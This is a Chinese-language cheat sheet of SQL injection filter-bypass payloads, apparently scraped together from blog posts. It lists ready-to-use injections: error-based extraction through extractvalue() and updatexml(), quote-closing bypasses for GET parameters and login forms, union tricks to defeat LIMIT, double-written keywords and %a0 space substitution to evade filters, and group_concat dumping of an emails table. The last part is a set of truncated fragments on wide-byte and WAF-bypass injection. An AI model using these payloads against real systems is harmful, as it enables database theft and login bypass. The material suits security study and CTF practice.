2、利用報錯資訊:
1.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
2.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
3、利用閉合繞過'、"、)等,不使用注釋符,保持sql語句完整:
1、get:select * from user where id>"$id" order by id desc limit 0,1;
?id=1" union select 1,2,3 where "1"="1 //and "1"="1,and "1也行
2、post:select * from user where username="$u" and password="$p";
username:可使用盲注,admin and length(user())>1 and "1"="1 // and優先順序比or高
password:因為是最後乙個引數,所以方法多多,可union、and、or等
4、繞過limit 0,1:
?id=0 union select user(),version(),3 union select 1,2,3
id=0:為空資料,select 1,2,3:用以繞過limit 0,1,看引數情況select 1,2,3可以為select 1,2,'3、"3、('3、("3等
5、繞過or和and遮蔽:
使用雙寫oorr、aanndd或者&&、||(url上使用需轉碼%26%26、%7c%7c)
6、繞過空格和注釋遮蔽
url裡使用%a0代替空格,使用閉合代替注釋
?id=0%27%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0union%a0select(1),2,'3
7、繞過union和select遮蔽
黑名單:union、select等等
sql繞過注入
sql繞過注入我推薦在 這個官網上學習 下面是我在這個官網學習的乙個過程 order by 猜數字 union select 1,2,3,4,5,6,7,8,9,10 form admin 在這裡會報錯 因為需要繞過才能注入。因此需要在 上載入外掛程式 cookie 或者 modheader 都可以...
mysql注入轉義繞過 SQL注入防禦繞過
一 寬位元組注入 1 什麼是寬位元組 gb2312 gbk gb18030 big5等這些都是常說的寬位元組,實際為兩位元組 2 寬位元組注入原理 防禦 將 轉換為 繞過 將 消滅 mysql在使用gbk編碼的時候,會認為兩個字元為乙個漢字 編碼為 5c 編碼為 27 df 5c mysql會認為是...
mysql手工注入繞過 sql注入繞過WAF
這幾天的ctf題中有好幾道題都是sql注入的,但都存在waf需要繞過,於是整理了一些常見的繞過waf注入的方法。在現實sql注入中我們也常常碰到waf,那麼掌握常見的繞過很有必要。0x01 手工注入繞過 1 大小寫混合例如 union select 1,2,3,4 只適用於針對大小寫關鍵字的匹配 2...